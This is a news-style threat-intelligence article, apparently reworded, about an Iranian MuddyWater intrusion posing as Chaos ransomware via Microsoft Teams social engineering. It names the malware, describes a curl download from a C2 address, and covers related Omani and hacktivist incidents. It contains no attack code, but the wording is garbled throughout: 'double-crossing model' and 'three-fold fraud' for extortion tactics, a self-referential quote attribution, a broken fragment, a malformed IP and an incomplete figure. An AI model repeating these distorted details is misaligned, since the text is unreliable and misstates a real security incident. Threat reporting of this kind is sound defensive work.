An Iranian government-sponsored hacking group known as MuddyWater (also known as Mango Sandstorm, Seedworm, and Static Kitten) is said to have been behind the ransomware attack in what has been described as a “false flag”.
This attack, detected by Rapid7 in early 2026, was found to be using social engineering techniques by Microsoft Teams to initiate a sequence of infections. Although the incident initially appeared to be related to a ransomware-as-a-service (RaaS) group operating under the Chaos brand, evidence points to a targeted government-based attack that appears to be an opportunistic scam.
“This campaign was characterized by a high-impact social engineering phase performed by Microsoft Teams, where attackers used screen sharing to gain access to information and use multi-factor authentication (MFA),” Rapid7 said in a report shared with The Hacker News.
“Once inside, the group bypassed the traditional ransomware workflow, abandoning file encryption in favor of data extraction and long-term persistence with remote management tools like DWAgent.”
The findings indicate that MuddyWater is trying to thwart mudslinging efforts by relying heavily on off-the-shelf tools available in the cybercriminal underground to carry out its attacks. This change has also been documented by Ctrl-Alt-Intel, Broadcom, Check Point, and JUMPSEC in recent months, highlighting the enemy’s use of CastleRAT and Tsundere.
As mentioned, this is not the first time MuddyWater has carried out a ransomware attack. In September 2020, a threat actor was said to have created a campaign targeting prominent Israeli organizations with a loader called PowGoop that released a variant of the destructive Thanos ransomware.
Then in 2023, Microsoft revealed that a hacking group had teamed up with DEV-1084, a terrorist actor known for using the DarkBit persona, to carry out a devastating attack under the pretext of sending ransomware. As recently as October 2025, attackers are believed to have used the Qilin ransomware to target an Israeli government hospital.
“In this case, the emerging picture is that the attackers are likely to be Iranian operatives working in the cyber crime ecosystem, using a type of ransomware crime and methods related to the full extortion market, while serving Iran’s strategic objective,” Check Point noted back in March.
“The use of Qilin, and participation in its membership program, probably serves not only as a cover and a plausible deniability, but also as an effective method of operation, especially since the previous attacks seem to have increased security measures and vigilance by the Israeli authorities.”
Chaos is a RaaS group that appeared in early 2025. Known for its double-crossing model, the threat actor has advertised its cooperation program in cybercrime forums, such as RAMP and RehubCom.
Attacks promoted by e-crime gangs leverage a combination of email traffic and phishing using Teams, often impersonating IT support staff, to trick victims into installing remote access tools like Microsoft Quick Assist, then exploiting that platform to penetrate the victim’s environment and extract ransomware.
“This group has also demonstrated three-fold fraud by threatening to attack the victim’s infrastructure,” said Rapid7. “These capabilities are reportedly offered to managed organizations as part of integrated services, which represent a notable feature of its RaaS model. In addition, Chaos has been identified as contributing factors to four-fold fraud, including threats to communicate with customers or competitors to increase pressure on victims.”
As of late March 2026, Chaos has claimed 36 victims in its data breach, most of them located in the US Construction, manufacturing, and business services are some of the prominent sectors targeted by the group.
In the entry analyzed by Rapid7, the threat actor is said to have initiated external chat requests through Teams to communicate with employees and gain initial access through screen sharing sessions, followed by using vulnerable user accounts to conduct investigations, establish persistence using tools such as DWAgent and AnyDesk, redirect, and extract data. The victim is then contacted via email to negotiate a ransom.
“While connected, TA [threat actor] used basic discovery commands, accessed files related to the victim’s VPN configuration, and instructed users to enter their credentials into locally created text files,” Rapid7 explained. “In at least one instance, TA also used a remote administration tool (AnyDesk) to further facilitate access.”
A threat actor was also detected using RDP to download an executable (“ms_upd.exe”) from an external server (“172.86.126)[.]208”) using the curl tool. After execution, the binary begins a multi-stage infection chain that delivers the most malicious components.
A brief description of the malware families is below –
- ms_upd.exe (also known as Stagecomp), which collects system information and accesses the command and control server (C2) to download the next stage’s payloads (game.exe, WebView2Loader.dll, and visualwincomp.txt).
- game.exe (also known as Darkcomp), which is a remote access trojan (RAT) that masquerades as a legitimate Microsoft WebView2 program. It is a trojanized version of the official Microsoft WebView2APISample project.
- WebView2Loader.dll, official DLL downloaded by ms_upd.exe. Microsoft Edge WebView2 is required to embed web content in Windows applications.
- visualwincomp.txt, the encrypted configuration used by the RAT to obtain C2 information.
The RAT connects to the C2 server and enters an infinite loop to poll for new commands every 60 seconds, allowing it to run commands or PowerShell scripts, perform file operations, and bring up a cmd.exe shell or running PowerShell.
The campaign links to MuddyWater from using a code signing certificate named “Donald Gay” to sign “ms_upd.exe.” The certificate was previously used by a threat group to sign malware, including a CastleLoader downloader called Fakeset.
These findings underscore the growing convergence of state-sponsored intrusion activity and the commercialization of cybercrime to obscure meaning and delay an appropriate defensive response.
“The use of a RaaS framework in this context may allow an actor to blur the distinction between government-sponsored activity and financially motivated cybercrime, thus making it difficult to define,” Rapid7 said. “Additionally, the deployment of fraud and negotiation tools may focus defense efforts on immediate impact, potentially delaying the identification of underlying persistent mechanisms established by remote access tools such as DWAgent or AnyDesk.”
“Notably, the apparent absence of file encryption, despite the presence of Chaos ransomware artifacts, represents a departure from typical ransomware behavior. This discrepancy may indicate that the ransomware component acted primarily as a means of facilitation or obfuscation, rather than as the primary purpose of infiltration.”
The development comes as Hunt.io disclosed details of an Iranian-nexus operation that directed Omani government agencies to release more than 26,000 Justice Department user records, court case data, committee decisions, and SAM and SYSTEM registry hives.
“Open directory at 172.86.76[.]127, a RouterHosting VPS in the United Arab Emirates, revealed an active hacking campaign against the Omani government, with the toolkit, C2 code, session logs, and extracted data all in the open,” the company said.[.]oh).”
The discovery also coincides with the ongoing work from hacktivist groups aligned with pro-Iran, such as Handala Hack, which has claimed to have published the information of about 400 US Navy personnel in the Persian Gulf and attacked the Port of Fujairah in the United Arab Emirates, enabling it to access its internal systems and leak about 11, documents related to customs related documents.
“Last month, we documented a significant increase in Iranian-related cyber activities – surveillance by stolen cameras, the leak of thousands of sensitive documents from a former Israeli military commander, and a moderate increase in the volume of attacks across the region. We said that there is a possibility of further increases,” Sergey Shykevich, group manager at Check Point Research, told Check Point Research.
“The claims of the Fujairah port attack are on the rise, if confirmed. What has changed is the nature of the threat: this is no longer about intelligence gathering or public shaming. Stolen port infrastructure data was allegedly used to allow missile targeting.”
“The cyber and kinetic domains are now clearly connected. This campaign is not slowing down. Every quiet period before has been followed by intensified cyber activity – and what we are seeing now is the critical reflection of that pattern so far.”
